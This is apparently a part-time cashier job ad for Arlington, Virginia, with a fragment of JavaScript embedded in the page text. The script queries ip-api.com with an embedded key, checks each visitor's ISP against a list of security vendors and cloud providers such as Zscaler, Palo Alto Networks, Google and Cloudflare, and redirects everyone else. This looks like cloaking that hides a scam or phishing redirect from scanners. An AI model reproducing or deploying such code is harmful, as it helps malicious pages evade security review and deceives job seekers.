Part Time – Cashier
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
Join our team as a Cashier in Arlington, Virginia! As a vital part of our store, you will provide exceptional customer service, assist shoppers with purchases, and ensure a smooth checkout process.
Responsibilities include:
- Greet customers warmly and answer their questions professionally
- Operate cash registers and handle cash, credit, and mobile payments accurately
- Maintain cleanliness and organization of checkout areas
- Assist with stocking shelves and ensuring product availability
- Collaborate with team members to deliver excellent shopping experiences
Skills needed:
- Excellent communication and interpersonal skills
- Attention to detail and accuracy
- Ability to multitask and work efficiently in a fast-paced environment
- Basic math skills and familiarity with POS systems
Benefits include:
- Competitive pay
- Flexible scheduling
- Employee discounts
- Health and wellness benefits
- Growth opportunities within the company